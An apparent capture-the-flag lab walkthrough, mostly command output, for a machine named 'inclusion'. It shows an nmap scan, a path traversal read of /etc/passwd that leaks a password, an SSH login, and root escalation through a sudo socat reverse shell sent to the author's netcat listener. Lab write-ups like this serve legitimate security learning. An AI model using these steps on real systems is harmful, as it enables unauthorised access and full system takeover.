$ nmap 10.10.161.132
Starting Nmap 7.91 ( <https://nmap.org> ) at 2020-11-20 10:48 AEST
Nmap scan report for 10.10.161.132
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Page format: 10.10.161.132/article?name=hacking
Try LFI: 10.10.161.132/article?name=../../../../etc/passwd → success!
Atypical line: #falconfeast:rootpassword
@kali:~$ ssh [email protected]
[email protected]'s password: rootpassword
falconfeast@inclusion:~$
falconfeast@inclusion:~$ cat user.txt -> success!
# SSH
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat
# [<https://gtfobins.github.io/gtfobins/socat/>](<https://gtfobins.github.io/gtfobins/socat/>)
# Kali
@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...
# SSH
falconfeast@inclusion:~$ RHOST=<my-THM-IP>
falconfeast@inclusion:~$ RPORT=4444
falconfeast@inclusion:~$ sudo socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
# Kali
connect to [<my-THM-IP>] from (UNKNOWN) [10.10.161.132] 38924
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cat /root/root.txt -> success!